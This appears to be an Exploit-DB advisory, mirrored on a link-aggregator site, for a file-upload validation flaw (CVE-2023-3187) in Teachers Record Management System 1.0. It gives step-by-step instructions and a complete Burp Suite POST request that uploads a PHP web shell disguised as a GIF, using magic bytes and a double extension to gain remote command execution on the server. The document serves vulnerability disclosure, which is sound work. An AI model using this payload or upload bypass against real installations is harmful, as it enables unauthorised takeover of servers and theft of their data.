7

[webapps] Teachers Record Management System 1.0 - File Upload Type Validation

 1 year ago
source link: https://www.exploit-db.com/exploits/51512
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Teachers Record Management System 1.0 - File Upload Type Validation

EDB-ID:

51512

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-06-13

Vulnerable App:

Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187

===============================
STEPS_TO_REPRODUCE
===============================
1. Login into Teacher-Account with the credentials “Username: [email protected]”
Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
5. Change the **Content-type from “ image/png “ to “ image/gif “
6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**
8. Below is the Burpsuite-POST Request for all the changes that I have made above

==========================================
BURPSUITE_REQUEST
==========================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: <http://localhost>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <http://localhost/trms/teacher/changeimage.php>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--


===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK